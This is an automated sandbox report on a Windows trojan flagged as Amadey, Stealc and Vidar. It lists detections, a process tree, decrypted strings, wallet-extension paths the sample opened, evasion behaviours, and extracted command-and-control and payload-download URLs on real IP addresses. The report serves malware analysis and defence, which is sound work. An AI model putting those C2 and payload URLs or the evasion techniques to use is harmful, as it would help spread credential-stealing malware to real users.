Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
So7a8eQerR.exe

Overview

General Information

Sample name:So7a8eQerR.exe
renamed because original name is a hash value
Original sample name:1608caccc377a28575b839e3eec49314.exe
Analysis ID:1467933
MD5:1608caccc377a28575b839e3eec49314
SHA1:ee0126916f65d88e92248d9c1bbe5ee2883d2abe
SHA256:bf54e9ba7f3f8d09aedef4e6d9d377f16bb085cb5353352a3f1bb5d17f3e1263
Tags:32exetrojan
Infos:

Detection

Amadey, Mars Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
Yara detected Mars stealer
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • So7a8eQerR.exe (PID: 7432 cmdline: "C:\Users\user\Desktop\So7a8eQerR.exe" MD5: 1608CACCC377A28575B839E3EEC49314)
    • explorti.exe (PID: 7620 cmdline: "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" MD5: 1608CACCC377A28575B839E3EEC49314)
  • explorti.exe (PID: 7736 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 1608CACCC377A28575B839E3EEC49314)
  • explorti.exe (PID: 7888 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: 1608CACCC377A28575B839E3EEC49314)
    • 37664d9843.exe (PID: 8076 cmdline: "C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exe" MD5: 5DF47A238D51FDAD9B442FEB6C833886)
      • cmd.exe (PID: 3096 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • GIEHIDHJDB.exe (PID: 7624 cmdline: "C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exe" MD5: 1608CACCC377A28575B839E3EEC49314)
      • cmd.exe (PID: 7424 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CFCBKKKJJJ.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 586ef238b2.exe (PID: 7592 cmdline: "C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exe" MD5: 5DF47A238D51FDAD9B442FEB6C833886)
      • cmd.exe (PID: 7628 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • CBFIIEHJDB.exe (PID: 8188 cmdline: "C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exe" MD5: 1608CACCC377A28575B839E3EEC49314)
      • cmd.exe (PID: 7656 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AAFIIJDAAA.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
{"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
{"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000003.00000002.4092705885.00000000005C1000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000004.00000002.1957654994.0000000000CE1000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
        00000004.00000002.1957654994.0000000000CE1000.00000040.00000001.01000000.00000009.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
          00000000.00000003.1637490155.0000000005120000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            00000003.00000003.1727956863.00000000051D0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              Click to see the 19 entries
              SourceRuleDescriptionAuthorStrings
              2.2.explorti.exe.5c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                11.2.GIEHIDHJDB.exe.aa0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  3.2.explorti.exe.5c0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                    20.2.CBFIIEHJDB.exe.250000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      0.2.So7a8eQerR.exe.950000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                        Click to see the 5 entries
                        No Sigma rule has matched
                        Timestamp:07/05/24-04:23:03.699208
                        SID:2856147
                        Source Port:49730
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:07/05/24-04:23:04.625841
                        SID:2856122
                        Source Port:80
                        Destination Port:49730
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: So7a8eQerR.exeAvira: detected
                        Source: http://85.28.47.30/69934896f997d5bb/softokn3.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/mine/amadka.exeAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/69934896f997d5bb/softokn3.dllVr7Avira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exeAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/69934896f997d5bb/freebl3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/freebl3.dll=Avira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/nss3.dllkAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/nss3.dllsAvira URL Cloud: Label: malware
                        Source: http://77.91.77.82/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/69934896f997d5bb/nss3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/sqlite3.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/nss3.dll;WAvira URL Cloud: Label: malware
                        Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/69934896f997d5bb/vcruntime140.dllAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/sqlite3.dllKAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/vcruntime140.dll3Avira URL Cloud: Label: malware
                        Source: http://85.28.47.30/920475a59bac849d.phpWAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/mine/amadka.exe00Avira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/Avira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/nss3.dllzWAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/920475a59bac849d.phpAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/msvcp140.dll.s/Avira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/msvcp140.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/stealc/random.exeAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/cost/go.exeDataAvira URL Cloud: Label: phishing
                        Source: http://77.91.77.81/cost/go.exe00Avira URL Cloud: Label: phishing
                        Source: http://77.91.77.81/mine/amadka.exeaAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/69934896f997d5bb/softokn3.dllqAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30/69934896f997d5bb/mozglue.dllAvira URL Cloud: Label: malware
                        Source: http://77.91.77.81/stealc/random.exeHAvira URL Cloud: Label: phishing
                        Source: http://85.28.47.30/69934896f997d5bb/msvcp140.dllvsAvira URL Cloud: Label: malware
                        Source: http://85.28.47.30Avira URL Cloud: Label: malware
                        Source: http://77.91.77.81/mine/amadka.exe.phpefoxxAvira URL Cloud: Label: phishing
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\amadka[1].exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                        Source: 00000004.00000002.1962741464.0000000001EDE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
                        Source: 15.2.586ef238b2.exe.200000.0.unpackMalware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.30/920475a59bac849d.php"}
                        Source: explorti.exe.7888.3.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php"]}
                        Source: http://77.91.77.81/mine/amadka.exeVirustotal: Detection: 26%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.phpQVirustotal: Detection: 22%Perma Link
                        Source: http://77.91.77.81/cost/go.exeVirustotal: Detection: 27%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.phpVirustotal: Detection: 24%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.phpmespaceVirustotal: Detection: 25%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpVirustotal: Detection: 22%Perma Link
                        Source: http://77.91.77.82/Hun4Ko/index.php=Virustotal: Detection: 21%Perma Link
                        Source: http://77.91.77.81/mine/amadka.exe00Virustotal: Detection: 25%Perma Link
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\amadka[1].exeReversingLabs: Detection: 42%
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeReversingLabs: Detection: 42%
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeReversingLabs: Detection: 42%
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeReversingLabs: Detection: 42%
                        Source: So7a8eQerR.exeReversingLabs: Detection: 42%
                        Source: So7a8eQerR.exeVirustotal: Detection: 47%Perma Link
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\GIEHIDHJDB.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\CBFIIEHJDB.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\amadka[1].exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJoe Sandbox ML: detected
                        Source: So7a8eQerR.exeJoe Sandbox ML: detected
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: INSERT_KEY_HERE
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetProcAddress
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: LoadLibraryA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: lstrcatA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: OpenEventA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: CreateEventA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: CloseHandle
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: Sleep
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetUserDefaultLangID
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: VirtualAllocExNuma
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: VirtualFree
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetSystemInfo
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: VirtualAlloc
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: HeapAlloc
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetComputerNameA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: lstrcpyA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetProcessHeap
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetCurrentProcess
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: lstrlenA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: ExitProcess
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GlobalMemoryStatusEx
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetSystemTime
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: SystemTimeToFileTime
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: advapi32.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: gdi32.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: user32.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: crypt32.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: ntdll.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetUserNameA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: CreateDCA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetDeviceCaps
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: ReleaseDC
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: CryptStringToBinaryA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: sscanf
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: VMwareVMware
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: HAL9TH
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: JohnDoe
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: DISPLAY
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: %hu/%hu/%hu
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: http://85.28.47.30
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: /920475a59bac849d.php
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: /69934896f997d5bb/
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: Nice
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetEnvironmentVariableA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetFileAttributesA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GlobalLock
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: HeapFree
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetFileSize
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GlobalSize
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: CreateToolhelp32Snapshot
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: IsWow64Process
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: Process32Next
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetLocalTime
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: FreeLibrary
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetTimeZoneInformation
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetSystemPowerStatus
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetVolumeInformationA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetWindowsDirectoryA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: Process32First
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetLocaleInfoA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetUserDefaultLocaleName
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetModuleFileNameA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: DeleteFileA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: FindNextFileA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: LocalFree
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: FindClose
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: SetEnvironmentVariableA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: LocalAlloc
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetFileSizeEx
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: ReadFile
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: SetFilePointer
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: WriteFile
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: CreateFileA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: FindFirstFileA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: CopyFileA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: VirtualProtect
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetLogicalProcessorInformationEx
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetLastError
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: lstrcpynA
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: MultiByteToWideChar
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GlobalFree
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: WideCharToMultiByte
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GlobalAlloc
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: OpenProcess
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: TerminateProcess
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: GetCurrentProcessId
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: gdiplus.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: ole32.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: bcrypt.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: wininet.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: shlwapi.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: shell32.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: psapi.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: rstrtmgr.dll
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: CreateCompatibleBitmap
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: SelectObject
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: BitBlt
                        Source: 15.2.586ef238b2.exe.200000.0.unpackString decryptor: DeleteObject
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeCode function: 4_2_6C066C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,4_2_6C066C80
                        Source: So7a8eQerR.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: Binary string: mozglue.pdbP source: 37664d9843.exe, 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, 586ef238b2.exe, 0000000F.00000002.3360531136.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                        Source: Binary string: freebl3.pdb source: freebl3.dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr
                        Source: Binary string: freebl3.pdbp source: freebl3.dll.4.dr, freebl3[1].dll.15.dr, freebl3[1].dll.4.dr
                        Source: Binary string: nss3.pdb@ source: 37664d9843.exe, 00000004.00000002.1984622236.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, 586ef238b2.exe, 0000000F.00000002.3360962751.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.dr
                        Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.4.dr, vcruntime140[1].dll.4.dr, vcruntime140[1].dll.15.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.4.dr, msvcp140[1].dll.15.dr
                        Source: Binary string: nss3.pdb source: 37664d9843.exe, 00000004.00000002.1984622236.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, 586ef238b2.exe, 0000000F.00000002.3360962751.000000006C28F000.00000002.00000001.01000000.0000000A.sdmp, nss3[1].dll.4.dr, nss3[1].dll.15.dr, nss3.dll.4.dr
                        Source: Binary string: mozglue.pdb source: 37664d9843.exe, 00000004.00000002.1984416281.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, 586ef238b2.exe, 0000000F.00000002.3360531136.000000006C0CD000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.15.dr, mozglue[1].dll.4.dr, mozglue.dll.4.dr
                        Source: Binary string: softokn3.pdb source: softokn3[1].dll.4.dr, softokn3[1].dll.15.dr, softokn3.dll.4.dr
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                        Networking

                        barindex
                        Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49730 -> 77.91.77.82:80
                        Source: TrafficSnort IDS: 2856122 ETPRO TROJAN Amadey CnC Response M1 77.91.77.82:80 -> 192.168.2.4:49730
